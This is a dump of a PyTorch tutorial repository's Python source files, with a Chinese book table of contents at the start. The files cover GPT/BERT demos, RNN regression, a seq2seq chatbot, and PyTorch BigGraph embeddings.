加油站之概率论基础知识回顾\t214\n - 5.6.1 离散型随机变量和连续型随机变量\t214\n - 5.6.2 概率论常用概念\t219\n - 5.6.3 二维随机变量\t220\n - 5.6.4 边缘分布\t223\n - 5.6.5 期望和方差\t224\n - 5.6.6 大数定理\t225\n - 5.6.7 马尔科夫不等式及切比雪夫不等式\t226\n - 5.6.8 中心极限定理\t227\n```\n第6章 自然语言处理\t227\n```\n- 6.1 自然语言基础\t227\n - 6.1.1 自然语言发展史\t228\n - 6.1.2 自然语言处理中的常见任务\t230\n - 6.1.3 统计自然语言理论\t232\n - 6.1.4 隐马尔可夫模型实现中文分词\t240\n- 6.2 关键字提取\t242\n - 6.2.1 TF-IDF\t243\n - 6.2.2 TextRank\t244\n - 6.2.3 主题模型\t245\n- 6.3 Word2vec和词嵌入\t246\n - 6.3.1 N-Gram模型\t246\n - 6.3.2 词袋模型\t247\n - 6.3.3 Word2vec词向量的密集表示\t248\n - 6.3.4 使用Word2vec生成词向量\t255\n - 6.3.5 Word2vec源码调试\t256\n - 6.3.6 Pytorch中使用词向量\t256\n- 6.4 变长序列处理\t258\n - 6.4.1 pack_padded_sequence压缩\t259\n - 6.4.2 pad_packed_sequence解压缩\t261\n- 6.5 Encoder-Decoder框架和注意力机制\t262\n - 6.5.1 Encoder-Decoder框架\t262\n - 6.5.2 Attention Mechanism注意力机制\t263\n- 6.6 实验室小试牛刀对话机器人\t266\n - 6.6.1 中文对话语料\t266\n - 6.6.2 构建问答词典\t267\n - 6.6.3 DataLoader数据加载\t268\n - 6.6.4 Encoder双向多层GRU\t271\n - 6.6.5 Attention注意力机制\t272\n - 6.6.6 Decoder多层GRU\t273\n - 6.6.7 模型训练\t274\n - 6.6.8 答案搜索及效果展示\t276\n- 6.7 加油站之常见的几种概率分布\t277\n - 6.7.1 二项分布\t277\n - 6.7.2 正态分布\t278\n - 6.7.3 均匀分布\t279\n - 6.7.4 泊松分布\t280\n - 6.7.5 卡方分布\t282\n - 6.7.6 Beta分布\t283\n```\n第7章 自然语言的曙光预训练模型\t284\n```\n- 7.1 预训练模型的应用\t285\n- 7.2 从Word Embedding到ELMO\t286\n - 7.2.1 Word Embedding头上的乌云\t286\n - 7.2.2 ELMO\t286\n- 7.3 从ELMO到GPT\t288\n - 7.3.1 GPT模型\t288\n - 7.3.2 使用GPT模型\t289\n- 7.4 从GPT到BERT\t291\n```\n第8章 自然语言处理利器AllenNLP\t295\n```\n- 8.1 中文词性标注\t295\n - 8.1.1 DatasetReader数据读取\t295\n - 8.1.2 定义Model模型\t297\n - 8.1.3 训练模型\t298\n - 8.1.4 模型预测\t300\n - 8.1.5 保存和加载模型\t300\n- 8.2 AllenNLP 使用Config 
Files\t301\n - 8.2.1 参数解析\t301\n - 8.2.2 注册数据读取器和模型\t301\n - 8.2.3 定义Jsonnet配置文件\t302\n - 8.2.4 命令行工具\t303\n - 8.2.5 特征融合\t304\n - 8.2.6 制作在线Demo\t306\n```\n第9章 FastAI高层深度学习框架\t307\n```\n- 9.1 FastAI框架中的原语\t307\n- 9.2 FastAI框架中使用BERT完成中文分类\t308\n - 9.2.1 分词器\t308\n - 9.2.2 定义字典\t309\n - 9.2.3 数据准备\t310\n - 9.2.4 构建Databunch和Learner\t311\n - 9.2.5 开始训练\t312\n - 9.2.6 模型保存和加载\t313\n - 9.2.7 模型预测\t313\n - 9.2.8 制作Rest接口提供服务\t313\n```\n第10章 Pytorch Big Graph大型图嵌入\t314\n```\n- 10.1 Pytorch Big Graph简介\t315\n - 10.1.1 PBG模型\t315\n - 10.1.2 模型的表示\t316\n - 10.1.3 正负样本及损失函数\t317\n - 10.1.4 分布式训练\t317\n - 10.1.5 批量负采样\t318\n- 10.2 PBG实践应用\t319\n - 10.2.1 模型配置文件\t320\n - 10.2.2 划分训练集和测试集\t321\n - 10.2.3 模型训练和验证\t322\n - 10.2.4 图嵌入向量及应用\t323\n\n\n" }, { "alpha_fraction": 0.5803108811378479, "alphanum_fraction": 0.6044905185699463, "avg_line_length": 31.22222137451172, "blob_id": "933ad1fc78ab6f661b41ad8adcb1b7f883a19868", "content_id": "6c6b2ef7453a9e044167e3ce01010ef62f607cff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 587, "license_type": "no_license", "max_line_length": 98, "num_lines": 18, "path": "/chapter3/multiprocess/train.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import os\nimport torch\nimport torch.optim as optim\n\ndef train(x_train,y_train,model):\n criterion = torch.nn.MSELoss()\n optimizer = torch.optim.SGD(model.parameters(),0.001) \n #开始训练\n num_epochs = 100000\n for i in range(num_epochs):\n input_data = x_train.unsqueeze(1)\n target = y_train.unsqueeze(1)\n out = model(input_data)\n loss = criterion(out,target)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n print(\"PID:{},Epoch:[{}/{}],loss:[{:.4f}]\".format(os.getpid(),i+1,num_epochs,loss.item()))" }, { "alpha_fraction": 0.7343412637710571, "alphanum_fraction": 0.7386609315872192, "avg_line_length": 30.931034088134766, "blob_id": "c52d8c19704f2b0a289d50a2a71e346aae38ae71", "content_id": "85adda2758e06cba7fd58158036ff00d0f0e109a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1018, "license_type": "no_license", "max_line_length": 102, "num_lines": 29, "path": "/chapter7/gpt.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "### First, tokenize the input\n#############################\nimport torch\ntokenizer = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'openAIGPTTokenizer', 'openai-gpt')\n\ntext = \"I Love \"\ntokenized_text = tokenizer.tokenize(text)\nindexed_tokens = tokenizer.convert_tokens_to_ids(tokenized_text)\ntokens_tensor = torch.tensor([indexed_tokens])\n\n\n#使用openAIGPTModel模型计算隐状态\nmodel = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'openAIGPTModel', 'openai-gpt')\n#转换为测试模式\nmodel.eval()\n#计算隐状态\nwith torch.no_grad():\n\thidden_states = model(tokens_tensor)\n\n\n#使用openAIGPTLMHeadModel模型对下一个词进行预测\nlm_model = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'openAIGPTLMHeadModel', 'openai-gpt')\nlm_model.eval()\n#得到预测值\nwith torch.no_grad():\n\tpredictions = lm_model(tokens_tensor)\n#取出最可能的词\npredicted_index = torch.argmax(predictions[0][0, -1, :]).item()\npredicted_token = tokenizer.convert_ids_to_tokens([predicted_index])[0]\n" }, { "alpha_fraction": 0.6507495641708374, "alphanum_fraction": 0.6907273530960083, "avg_line_length": 34.313724517822266, "blob_id": "dc8c057a56fcf27660500b7f9988256423cacdf3", "content_id": 
"a489f8d4eab1fa122a53ca358f636034b3d26b58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1873, "license_type": "no_license", "max_line_length": 74, "num_lines": 51, "path": "/chapter10/PBG/app.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import json\nimport h5py\nimport os\n\nDATA_DIR = \"datas/soc-LiveJournal\"\n#加载生成的实体字典\nwith open(os.path.join(DATA_DIR,\"dictionary.json\"), \"rt\") as tf:\n dictionary = json.load(tf)\n#查找用户\"1\"在字典中的索引\nuser_id = \"0\"\noffset = dictionary[\"entities\"][\"user_id\"].index(user_id)\nprint(\"用户{}在字典中的索引为{}\".format(user_id, offset))\n\n#加载嵌入文件\nwith h5py.File(\"model/demo/embeddings_user_id_1.v10.h5\", \"r\") as hf:\n embedding_user_0 = hf[\"embeddings\"][offset, :]\n embedding_all = hf[\"embeddings\"][:]\n\nprint(embedding_user_0.shape)\nprint(embedding_all.shape)\n\nfrom torchbiggraph.model import DotComparator\nsrc_entity_offset = dictionary[\"entities\"][\"user_id\"].index(\"0\")\ndest_1_entity_offset = dictionary[\"entities\"][\"user_id\"].index(\"7\")\ndest_2_entity_offset = dictionary[\"entities\"][\"user_id\"].index(\"135\")\n\nwith h5py.File(\"model/demo/embeddings_user_id_0.v10.h5\", \"r\") as hf:\n src_embedding = hf[\"embeddings\"][src_entity_offset, :]\n dest_1_embedding = hf[\"embeddings\"][dest_1_entity_offset, :]\n dest_2_embedding = hf[\"embeddings\"][dest_2_entity_offset, :]\n dest_embeddings = hf[\"embeddings\"][...]\n\nimport torch\ncomparator = DotComparator()\n\nscores_1, _, _ = comparator(\n comparator.prepare(torch.tensor(src_embedding.reshape([1,1,520]))),\n comparator.prepare(torch.tensor(dest_1_embedding.reshape([1,1,520]))),\n torch.empty(1, 0, 520), # Left-hand side negatives, not needed\n torch.empty(1, 0, 520), # Right-hand side negatives, not needed\n)\n\nscores_2, _, _ = comparator(\n comparator.prepare(torch.tensor(src_embedding.reshape([1,1,520]))),\n comparator.prepare(torch.tensor(dest_2_embedding.reshape([1,1,520]))),\n torch.empty(1, 0, 520), # Left-hand side negatives, not needed\n torch.empty(1, 0, 520), # Right-hand side negatives, not needed\n)\n\nprint(scores_1)\nprint(scores_2)\n" }, { "alpha_fraction": 0.6195579171180725, "alphanum_fraction": 0.6255860924720764, "avg_line_length": 41.68571472167969, "blob_id": "67104e161115e4cd9a42167a294877565c96c773", "content_id": "0939bdcfd6ce2682f68cef677860f4061b1e9ff1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1649, "license_type": "no_license", "max_line_length": 105, "num_lines": 35, "path": "/chapter6/robot/search.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\n\n\n\nclass GreedySearchDecoder(nn.Module):\n def __init__(self, encoder, decoder):\n super(GreedySearchDecoder, self).__init__()\n self.encoder = encoder\n self.decoder = decoder\n\n def forward(self, sos, eos, input_seq, input_length, max_length, device):\n # Encoder的Forward计算 \n encoder_outputs, encoder_hidden = self.encoder(input_seq, input_length)\n # 把Encoder最后时刻的隐状态作为Decoder的初始值\n decoder_hidden = encoder_hidden[:self.decoder.num_layers]\n # Decoder的初始输入是SOS\n decoder_input = torch.ones(1, 1, device=device, dtype=torch.long) * sos\n all_tokens = torch.zeros([0], device=device, dtype=torch.long)\n all_scores = torch.zeros([0], device=device)\n # 搜索,直到遇到EOS结束符或者达到最大解码长度\n for _ in range(max_length):\n # 
单步执行Decoder Forward\n #decodr shape:(batch,vob_size)=(1,vob_size)\n decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs)\n # 返回概率最大的词的概率和得分\n decoder_scores, decoder_input = torch.max(decoder_output, dim=1)\n all_tokens = torch.cat((all_tokens, decoder_input), dim=0)\n all_scores = torch.cat((all_scores, decoder_scores), dim=0)\n # 用unsqueeze增加batch维度。\n if decoder_input.item() == eos:\n break\n decoder_input = torch.unsqueeze(decoder_input, 0)\n # 返回所有的词和得分。\n return all_tokens, all_scores" }, { "alpha_fraction": 0.73221755027771, "alphanum_fraction": 0.7428387403488159, "avg_line_length": 42.760562896728516, "blob_id": "1852c1abb7745b1808b87c83f38e49ec923dfa86", "content_id": "f4ec9558beec48d338c51fa788dd6eb02509f6ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3179, "license_type": "no_license", "max_line_length": 128, "num_lines": 71, "path": "/chapter7/bert.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "\nimport torch\n#下载BERT分词器\ntokenizer = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'bertTokenizer', 'bert-base-chinese', do_basic_tokenize=False)\n#构建输入\ntext = \"[CLS]北京天安门。[SEP]四川成都。[SEP]\"\ntokenized_text = tokenizer.tokenize(text)\nindexed_tokens = tokenizer.convert_tokens_to_ids(tokenized_text)\n\n### Get the hidden states computed by `bertModel`\n# Define sentence A and B indices associated to 1st and 2nd sentences (see paper)\nsegments_ids = [0, 0, 0, 0, 0, 0,0,0,1, 1, 1, 1, 1, 1]\n\n# Convert inputs to PyTorch tensors\nsegments_tensors = torch.tensor([segments_ids])\ntokens_tensor = torch.tensor([indexed_tokens])\n\nmodel = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'bertModel', 'bert-base-chinese')\nmodel.eval()\n\nwith torch.no_grad():\n encoded_layers, _ = model(tokens_tensor, segments_tensors)\n\n\n ### Predict masked tokens using `bertForMaskedLM`\n # Mask a token that we will try to predict back with `BertForMaskedLM`\n masked_index = 12\n tokenized_text[masked_index] = '[MASK]'\n indexed_tokens = tokenizer.convert_tokens_to_ids(tokenized_text)\n tokens_tensor = torch.tensor([indexed_tokens])\n \n maskedLM_model = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'bertForMaskedLM', 'bert-base-chinese')\n maskedLM_model.eval()\n \n with torch.no_grad():\n predictions = maskedLM_model(tokens_tensor, segments_tensors)\n \n # Get the predicted token\n predicted_index = torch.argmax(predictions[0][0, masked_index]).item()\n predicted_token = tokenizer.convert_ids_to_tokens([predicted_index])[0]\n #assert predicted_token == 'Jim'\n\n### Classify next sentence using ``bertForNextSentencePrediction``\n# Going back to our initial input\n#text = \"[CLS]四川的省会是? [SEP]成都[SEP]\"\ntext = \"[CLS]四川的省会是? 
[SEP]滚蛋[SEP]\"\ntokenized_text = tokenizer.tokenize(text)\nindexed_tokens = tokenizer.convert_tokens_to_ids(tokenized_text)\ntokens_tensor = torch.tensor([indexed_tokens])\nsegments_ids = [0, 0, 0, 0, 0, 0,0,0,0,1, 1, 1]\n# Convert inputs to PyTorch tensors\nsegments_tensors = torch.tensor([segments_ids])\nnextSent_model = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'bertForNextSentencePrediction', 'bert-base-chinese')\nnextSent_model.eval()\n\n# Predict the next sentence classification logits\nwith torch.no_grad():\n    next_sent_classif_logits = nextSent_model(tokens_tensor, segments_tensors)\n\n### Fine-tune BERT using `bertForPreTraining`\ntokens_tensor = torch.tensor([indexed_tokens])\nsegments_tensors = torch.tensor([segments_ids])\n\nforPretraining_model = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'bertForPreTraining', 'bert-base-cased')\nmasked_lm_logits_scores, seq_relationship_logits = forPretraining_model(tokens_tensor, segments_tensors)\n\n### Fine-tune BERT using `bertForPreTraining`\ntokens_tensor = torch.tensor([indexed_tokens])\nsegments_tensors = torch.tensor([segments_ids])\n#large case\nforPretraining_model = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'bertForPreTraining', 'bert-large-cased')\nmasked_lm_logits_scores, seq_relationship_logits = forPretraining_model(tokens_tensor, segments_tensors)" }, { "alpha_fraction": 0.5960590839385986, "alphanum_fraction": 0.6147783398628235, "avg_line_length": 31.22222137451172, "blob_id": "d8049053e252d84f7beb0a18ac485ce2e5b62cee", "content_id": "f75e91b57a2dfb9d75015a715c59c0d977431601", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2204, "license_type": "no_license", "max_line_length": 108, "num_lines": 62, "path": "/chapter5/RNN/RNNRegression.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import torch\nfrom torch import nn\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nbins = 50           # RNN时间步长\ninput_dim = 1      # RNN输入尺寸\nlr = 0.01           # 初始学习率\nepochs = 2000        # 轮数\nhidden_size=32  # 隐藏层神经元个数\nnum_layers = 2   # 神经元层数\nnonlinearity=\"relu\" #只支持relu和tanh\n\nclass RNNDemo(nn.Module):\n    def __init__(self,input_dim,hidden_size,num_layers,nonlinearity):\n        super().__init__()\n        self.input_dim = input_dim\n        self.hidden_size = hidden_size\n        self.num_layers = num_layers\n        self.nonlinearity = nonlinearity\n        self.rnn = nn.RNN(\n            input_size=input_dim,\n            hidden_size=hidden_size,\n            num_layers=num_layers,\n            nonlinearity=nonlinearity\n        )\n        self.out = nn.Linear(hidden_size, 1)\n\n    def forward(self, x, h):\n        r_out, h_state = self.rnn(x,h)\n        outs = []        \n        for time_step in range(r_out.size(1)):\n            outs.append(self.out(r_out[:, time_step, :]))\n        return torch.stack(outs, dim=1), h_state\n\n\n\nrnnDemo = RNNDemo(input_dim,hidden_size,num_layers,nonlinearity).cuda()\noptimizer = torch.optim.Adam(rnnDemo.parameters(), lr=lr)\nloss_func = nn.MSELoss()\n\nh_state = None\nfor step in range(epochs):\n    start, end = step * np.pi, (step + 1) * np.pi  # 时间跨度\n    # 使用Sin函数预测Cos函数\n    steps = np.linspace(start, end, bins, dtype=np.float32, endpoint=False)\n    x_np = np.sin(steps)\n    y_np = np.cos(steps)\n    x = torch.from_numpy(x_np).unsqueeze(1).unsqueeze(2).cuda()#【50,1,1】尺寸大小为(time_step, batch, input_size)\n    y = torch.from_numpy(y_np).unsqueeze(1).unsqueeze(2).cuda()#【50,1,1】\n    prediction, h_state = rnnDemo(x, h_state)   # RNN输出(预测结果,隐藏状态)\n    #将每一次输出的中间状态传递下去(不带梯度)\n    h_state = h_state.detach()  \n    loss = 
loss_func(prediction, y)\n    optimizer.zero_grad()\n    loss.backward()\n    optimizer.step()\n    if(step%100==0):\n        print(\"loss:{:.8f}\".format(loss))\nplt.scatter(steps,y_np,marker=\"^\")\nplt.scatter(steps, prediction.cpu().data.numpy().flatten(),marker=\".\")\nplt.show()" }, { "alpha_fraction": 0.7019762992858887, "alphanum_fraction": 0.7035573124885559, "avg_line_length": 27.772727966308594, "blob_id": "0f0d8aa93a6cb74494018b628ed21ef505a83b3e", "content_id": "12de450ee8c1db99849594823e41a9fdb1b3a7c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1455, "license_type": "no_license", "max_line_length": 79, "num_lines": 44, "path": "/chapter10/PBG/train_and_test.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import os\nimport attr\n\nfrom torchbiggraph.converters.import_from_tsv import convert_input_data\nfrom torchbiggraph.config import parse_config\nfrom torchbiggraph.train import train\nfrom torchbiggraph.eval import do_eval\n\n\nDATA_DIR = \"datas/soc-LiveJournal\"\nCONFIG_PATH = \"config.py\"\nFILENAMES = {\n    'train': 'train.txt',\n    'test': 'test.txt',\n}\n\ndef convert_path(fname):\n    \"\"\"\n    辅助方法,用于将真实文件绝对路径文件名后缀使用_partitioned替换\n    \"\"\"\n    basename, _ = os.path.splitext(fname)\n    out_dir = basename + '_partitioned'\n    return out_dir\n\nedge_paths = [os.path.join(DATA_DIR, name) for name in FILENAMES.values()]\ntrain_paths = [convert_path(os.path.join(DATA_DIR, FILENAMES['train']))]\neval_paths = [convert_path(os.path.join(DATA_DIR, FILENAMES['test']))]\n\ndef run_train_eval():\n    #将数据转为PBG可读的分区文件\n    convert_input_data(CONFIG_PATH,edge_paths,lhs_col=0,rhs_col=1,rel_col=None)\n    #解析配置\n    config = parse_config(CONFIG_PATH)\n    #训练配置,已分区的train_paths路径替换配置文件中的edge_paths\n    train_config = attr.evolve(config, edge_paths=train_paths)\n    #传入训练配置文件开始训练\n    train(train_config)\n    #测试配置,已分区的eval_paths路径替换配置文件中的edge_paths\n    eval_config = attr.evolve(config, edge_paths=eval_paths)\n    #开始验证\n    do_eval(eval_config)\n\nif __name__ == \"__main__\":\n    run_train_eval()" }, { "alpha_fraction": 0.5821917653083801, "alphanum_fraction": 0.6164383292198181, "avg_line_length": 23.851064682006836, "blob_id": "fbba25d29e64ad34dae814ac25bb93b8312bd93a", "content_id": "210ec0819bacb58b55c6b06fff18455fd601711f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1424, "license_type": "no_license", "max_line_length": 57, "num_lines": 47, "path": "/chapter6/robot/config.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import torch\n\nclass Config:\n    '''\n    Chatbot模型参数\n    '''\n    corpus_data_path = './QNS_corpus.pth'  #已处理的对话数据\n    use_QA_first = True  #是否载入知识库\n    max_input_length = 30  #输入的最大句子长度\n    max_generate_length = 30  #生成的最大句子长度\n    prefix = 'checkpoints/chatbot'  #模型断点路径前缀\n    model_ckpt = 'checkpoints/chatbot_0630_1610'  #加载模型路径\n    '''\n    训练超参数\n    '''\n    batch_size = 128\n    shuffle = True  #dataloader是否打乱数据\n    num_workers = 0  #dataloader多进程提取数据\n    bidirectional = True  #Encoder-RNN是否双向\n    hidden_size = 128\n    embedding_dim = 300\n    method = 'dot'  #attention method\n    dropout = 0.0  #是否使用dropout\n    clip = 50.0  #梯度裁剪阈值\n    num_layers = 2  #Encoder-RNN层数\n    learning_rate = 1e-3\n    #teacher_forcing比例\n    teacher_forcing_ratio = 1.0 \n    decoder_learning_ratio = 1.0\n    drop_last = True\n    '''\n    训练周期信息\n    '''\n    epoch = 200\n    print_every = 1  #每多少步打印一次\n    save_every = 10  #每迭代多少Epoch保存一次模型\n    '''\n    GPU#是否使用gpu\n    '''\n    use_gpu = 
torch.cuda.is_available() \n #使用GPU或CPU\n device = torch.device(\"cuda\" if use_gpu else \"cpu\")\n #是否使用固定缓冲区\n pin_memory = True if(use_gpu) else False\n\nif __name__==\"__main__\":\n print(Config.pin_memory)\n" }, { "alpha_fraction": 0.5908860564231873, "alphanum_fraction": 0.6050633192062378, "avg_line_length": 28.477611541748047, "blob_id": "04f6a2be2f3430f02e2f98d4ae184f83a36d41d5", "content_id": "6aef3241393fec8161a7dbd7a14f6677f20f0874", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2263, "license_type": "no_license", "max_line_length": 120, "num_lines": 67, "path": "/chapter6/robot/data_prepare.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.nn.utils.rnn import pack_padded_sequence,pad_packed_sequence\nimport jieba\nimport re\n\n#未录入字符替换符\nunknown = '</UNK>' \n#句子结束符\neos = '</EOS>' \n#句子开始符\nsos = '</SOS>' \n#句子填充符\npadding = '</PAD>' \n#字典最大长度\nmax_voc_length = 50000 \n#加入字典的词的词频最小值\nmin_freq = 1\n#最大句子长度\nmax_sentence_length = 50 \n#已处理的对话数据集保存路径\nsave_path = 'QNS_corpus.pth' \n#中文英文处理正则\nreg = re.compile(\"[^\\u4e00-\\u9fa5^a-z^A-Z^0-9]\")\n\ndef datapreparation():\n '''处理对话数据集'''\n data = []\n lines = np.load(\"./datas/CN-corpus.npy\")\n for line in lines:\n values = line.split('|')\n sentences = []\n for value in values:\n sentence = jieba.lcut(reg.sub(\"\",value))\n #每句话的结束,添加</EOS>标记\n sentence = sentence[:max_sentence_length] + [eos]\n sentences.append(sentence)\n data.append(sentences)\n '''生成字典和句子索引'''\n words_dict = {} #统计单词的词频\n def update(word):\n words_dict[word] = words_dict.get(word, 0) + 1\n #更新词典\n {update(word) for sentences in data for sentence in sentences for word in sentence}\n #按词频从高到低排序\n word_nums_list = sorted([(num, word) for word, num in words_dict.items()], reverse=True)\n #词典最大长度: max_voc_length 最小单词词频: min_freq\n words = [word[1] for word in word_nums_list[:max_voc_length] if word[0] >= min_freq]\n words = [unknown, padding, sos] + words\n word2ix = {word: ix for ix, word in enumerate(words)}\n ix2word = {ix: word for word, ix in word2ix.items()}\n #使用构建的词典对原对话语料进行编码\n ix_corpus = [[[word2ix.get(word, word2ix.get(unknown)) for word in sentence] for sentence in item] for item in data]\n clean_data = {\n 'corpus': ix_corpus, \n 'word2ix': word2ix,\n 'ix2word': ix2word,\n 'unknown' : '</UNK>',\n 'eos' : '</EOS>',\n 'sos' : '</SOS>',\n 'padding': '</PAD>',\n }\n torch.save(clean_data, save_path)\n return words_dict\nif __name__ == \"__main__\":\n datapreparation()\n" } ]
22
Mytholody/sentimentPlotter
https://github.com/Mytholody/sentimentPlotter
b78e52070d8915dbac15235638ce6fb6de19bbbf
aee443559896dd08a3c19832bb2f54c7ac958d22
8719e7e12e3e51aa459775dd318304df01ce6672
refs/heads/master
2020-06-02T17:50:39.304696
2019-06-10T22:42:57
2019-06-10T22:42:57
191,255,107
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8224852085113525, "alphanum_fraction": 0.8224852085113525, "avg_line_length": 41.25, "blob_id": "aeb8d8e0d5f8dfece1881867eac17b9ba62d367d", "content_id": "e3aef2f0365adee7d3612f131ad693b6290dd0f1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 169, "license_type": "permissive", "max_line_length": 103, "num_lines": 4, "path": "/README.md", "repo_name": "Mytholody/sentimentPlotter", "src_encoding": "UTF-8", "text": "# sentimentPlotter\nTakes a story text as input, attempts to rank sentinces and display the sentiment of the top sentences.\n\nRequires Bokeh and textblob python libraries\n" }, { "alpha_fraction": 0.6464646458625793, "alphanum_fraction": 0.6602020263671875, "avg_line_length": 24.515464782714844, "blob_id": "cca50b598616a815ba379a039f6d0ca0c22b3b36", "content_id": "f11cf0bf5ba0773f25ce275a8ce603216ad64e6f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2475, "license_type": "permissive", "max_line_length": 119, "num_lines": 97, "path": "/plotSentiment.py", "repo_name": "Mytholody/sentimentPlotter", "src_encoding": "UTF-8", "text": "# @author Kyle\n# Copyright Kyle 2019\n# Generates a plot of ups and downs in a given story structure\n# Inspired by https://github.com/IndicoDataSolutions/plotlines\n# (see above for use of a trained sentiment api and other nifty things, including an awesome description of everything)\n#bokeh code based on https://bokeh.pydata.org/en/1.0.0/docs/user_guide/examples/tools_hover_tooltip_formatting.html\nimport numpy as np\n\nfrom bokeh.io import output_file, show\nfrom bokeh.models import ColumnDataSource, HoverTool\nfrom bokeh.plotting import figure\n\nfrom textblob import TextBlob\nimport heapq\n\nfileName = \"t1.txt\"\n\nfile = open(fileName)\ntext = TextBlob(file.read())\nword_counts = text.word_counts\n\nvals = []\nnums = []\nsents = []\ni = 0\n\nfor thing in text.sentences:\n sents.append(thing)\n vals.append(thing.sentiment.polarity)\n nums.append(i)\n i = i + 1\n\n# Thanks to ideas from https://medium.com/incedge/text-summarization-96079bf23e83\nsentence_scores = {}\nfor sent in sents:\n count = 0\n words = sent.words\n for word in words:\n if word in word_counts:\n count += word_counts[word]\n sentence_scores[sent] = count\n\n\nsummary_sent = heapq.nlargest(15, sentence_scores, key=sentence_scores.get)\n\nsumm = []\nfor sent in summary_sent:\n summ.append(sents.index(sent))\n summ.sort()\n\nvals = []\nnums = []\n\nfor thing in summ:\n vals.append(sents[thing].sentiment.polarity)\n nums.append(thing)\n print sents[thing]\n\nsent_list = []\n\nfor thing in nums:\n sent_list.append(str(sents[thing]))\n\noutput_file(\"sentiment_quantifier.html\")\n\nsource = ColumnDataSource(data={\n 'numsent' : nums,\n 'sent val' : vals,\n 'sent list' : sent_list,\n })\n\np = figure(plot_height=250, x_axis_type=\"linear\", tools=\"\", toolbar_location=None,\n title=\"Sentiment Quantifier\", sizing_mode=\"scale_width\")\np.background_fill_color=\"#f5f5f5\"\np.grid.grid_line_color=\"white\"\np.xaxis.axis_label = 'Sentence Number'\np.yaxis.axis_label = 'Sentiment Polarity'\np.axis.axis_line_color = None\n\np.line(x='numsent', y='sent val', line_width=2, color='#ebbd5b', source=source)\n\np.add_tools(HoverTool(\n tooltips=[\n ( 'Sentence Number :', '@numsent{%1.4f}' ),\n ( 'Sentiment Polarity:', '@{sent val}{%1.4f}' ),\n ( 'Sentence :', '@{sent list}{%s}' ),\n ],\n\n formatters={\n 'numsent' : 'printf',\n 'sent 
val' : 'printf',\n 'sent list' : 'printf',\n },\n mode='vline'\n))\n\nshow(p)\n" } ]
2
IqbalLx/face-verifification
https://github.com/IqbalLx/face-verifification
79e2942523b26e48d2fa4e5ab957ab541b2bb396
4a9190638433eb99d5e1e0373c616bed1a87fca3
3baf0aefb845741ddd71fe57a571a8d298106f98
refs/heads/main
2023-02-10T21:09:24.185175
2021-01-01T01:06:48
2021-01-01T01:06:48
325,940,300
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5916542410850525, "alphanum_fraction": 0.5931445360183716, "avg_line_length": 23.83333396911621, "blob_id": "03104de9ab16c09d3a96275edb9c8249829a7096", "content_id": "085fa2d17e9688dd6c55943291fec9537874ef0d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1342, "license_type": "no_license", "max_line_length": 72, "num_lines": 54, "path": "/src/database.py", "repo_name": "IqbalLx/face-verifification", "src_encoding": "UTF-8", "text": "import sqlite3 as sqlite\nfrom sqlite3 import Error\n\nimport os\nimport glob\n\nimport config\n\n\"\"\"\nFile untuk mengatur seluruh komunikasi script \ndengan database menggunakan SQLite\n\"\"\"\n\nclass Database():\n def __init__(self):\n self.conn = sqlite.connect(config.DB_PATH)\n self.curs = self.conn.cursor()\n\n def create_table(self):\n self.curs.execute(config.CREATE_TABLE_QUERY)\n\n def show(self):\n self.curs.execute(config.SHOW_QUERY)\n data = self.curs.fetchall()\n \n return data\n \n def insert_user(self, ids, name):\n self.curs.execute(config.INSERT_DATA_QUERY, (ids, name))\n self.conn.commit()\n \n def update_name(self, ids, new_name):\n self.curs.execute(config.UPDATE_DATA_QUERY, (new_name, ids))\n self.conn.commit()\n\n def get_name(self, ids):\n try:\n self.curs.execute(config.SELECT_NAME_QUERY, (ids,))\n name = self.curs.fetchone()\n except Error:\n name = \"Not Found\"\n 